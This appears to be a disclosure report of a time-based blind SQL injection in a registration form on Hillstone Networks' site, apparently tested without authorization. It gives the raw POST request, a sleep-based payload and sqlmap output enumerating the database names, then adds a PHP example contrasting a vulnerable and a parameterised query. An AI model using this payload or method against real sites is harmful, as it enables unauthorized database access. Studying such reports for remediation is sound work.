A SQL injection vulnerability in the main site of Hillstone Networks affects database security.
After seeing your recruitment information, I tested it out of curiosity...
POST request:
POST /pub/iNGFWtest/register.php HTTP/1.1
Content-Length: 552
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.hillstonenet.com.cn:80/
Cookie: lc8_sid=wzNkuS; PHPSESSID=tnt4a2du63440nmb3fhj9f3hr6; lc8_oldtopics=D2206D1476D907D2274D71D; lc8_visitedfid=43D15D16D17D41; ndIz_2132_saltkey=ozV4Ig0K; ndIz_2132_lastvisit=1452227947; ndIz_2132_sid=Shmv2X; ndIz_2132_lastact=1452231547%09forum.php%09; phpcms_searchtime=1452231547
Host: www.hillstonenet.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

brand%5b%5d=*&company=Acunetix&configable=%e7%86%9f%e7%bb%83&credentiales%5b%5d=CCNA&email=[email protected]&environment=%e7%8e%b0%e7%bd%91%e6%b5%81%e9%87%8f%e7%8e%af%e5%a2%83&equipment%5b%5d=%e4%b8%8b%e4%b8%80%e4%bb%a3%e9%98%b2%e7%81%ab%e5%a2%99&experience=1-3&hangye=%e6%94%bf%e5%ba%9c&media%5b%5d=%e6%96%b0%e6%b5%aa%e5%be%ae%e5%8d%9a&renshu=100%e4%ba%ba%e4%bb%a5%e4%b8%8b&shipin=%e6%98%af&tel=555-666-0606&username=admin
The first parameter, brand[], is injectable.
Time-based blind injection is slow, so the 26 tables in the hillstonenet database were not enumerated.
sqlmap identified the following injection point(s) with a total of 181 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: brand[]=(select(0)from(select(sleep(0)))v)/' AND (SELECT * FROM (SELECT(SLEEP(5)))OdMr) AND 'HqPD'='HqPD'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/&company=Acunetix&configable=%e7%86%9f%e7%bb%83&credentiales[]=CCNA&email=[email protected]&environment=%e7%8e%b0%e7%bd%91%e6%b5%81%e9%87%8f%e7%8e%af%e5%a2%83&equipment[]=%e4%b8%8b%e4%b8%80%e4%bb%a3%e9%98%b2%e7%81%ab%e5%a2%99&experience=1-3&hangye=%e6%94%bf%e5%ba%9c&media[]=%e6%96%b0%e6%b5%aa%e5%be%ae%e5%8d%9a&renshu=100%e4%ba%ba%e4%bb%a5%e4%b8%8b&shipin=%e6%98%af&tel=555-666-0606&username=admin
---
[13:54:09] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[13:54:09] [INFO] fetching database names
[13:54:09] [INFO] fetching number of databases
[13:54:09] [INFO] retrieved:
[13:54:09] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
2
[13:54:22] [INFO] retrieved:
[13:54:27] [INFO] adjusting time delay to 2 seconds due to good response times
information_schema
[13:57:06] [INFO] retrieved: hillstonenet
available databases [2]:
[*] hillstonenet
[*] information_schema
[13:59:06] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.hillstonenet.com.cn'
[*] shutting down at 13:59:06
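How an array form field such as brand[] turns into this class of bug, and what the fix looks like, as an added example that is not code from hillstonenet.com.cn or from this report: the vulnerable pattern glues each array element into the SQL text, while the hardened one binds each element to its own placeholder. It assumes a PHP build with PDO and the SQLite driver; the vendors table and the inputs are constructed stand-ins for the real registration form.

```php
<?php
// Added example (not the site's code). An in-memory SQLite database stands in for
// the MySQL backend so the script runs stand-alone; the table is a constructed assumption.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE vendors (name TEXT)");
$db->exec("INSERT INTO vendors (name) VALUES ('Hillstone'), ('Cisco'), ('Juniper')");

// Vulnerable pattern: every brand[] element is quoted by hand and concatenated into the
// statement. An element containing a single quote closes the string literal, and the
// remainder is parsed as SQL; a sleep() placed there is what sqlmap's time-based test measures.
function countVendorsVulnerable(PDO $db, array $brands): int
{
    $list = "'" . implode("','", $brands) . "'";
    $sql  = "SELECT COUNT(*) FROM vendors WHERE name IN ($list)";
    return (int) $db->query($sql)->fetchColumn();
}

// Hardened pattern: one '?' placeholder per array element and the values bound separately,
// so attacker-controlled text never reaches the parser as part of the statement.
function countVendorsSafe(PDO $db, array $brands): int
{
    if ($brands === []) {
        return 0;
    }
    $placeholders = implode(',', array_fill(0, count($brands), '?'));
    $stmt = $db->prepare("SELECT COUNT(*) FROM vendors WHERE name IN ($placeholders)");
    $stmt->execute(array_values($brands));
    return (int) $stmt->fetchColumn();
}

// Constructed inputs in the same shape as brand[] from the report: a normal submission and
// one whose element carries a quote that breaks out of the string literal.
$normal   = ['Hillstone', 'Cisco'];
$injected = ["Hillstone') OR ('1'='1"];

// With the vulnerable function the second input rewrites the WHERE clause and matches every
// row; with the prepared statement the same input is compared as a literal name and matches none.
printf("vulnerable, normal:   %d\n", countVendorsVulnerable($db, $normal));
printf("vulnerable, injected: %d\n", countVendorsVulnerable($db, $injected));
printf("safe, normal:         %d\n", countVendorsSafe($db, $normal));
printf("safe, injected:       %d\n", countVendorsSafe($db, $injected));
```

The same placeholder-per-element construction applies to the other array fields in the request (credentiales[], equipment[], media[]), since each is attacker-controlled in exactly the same way.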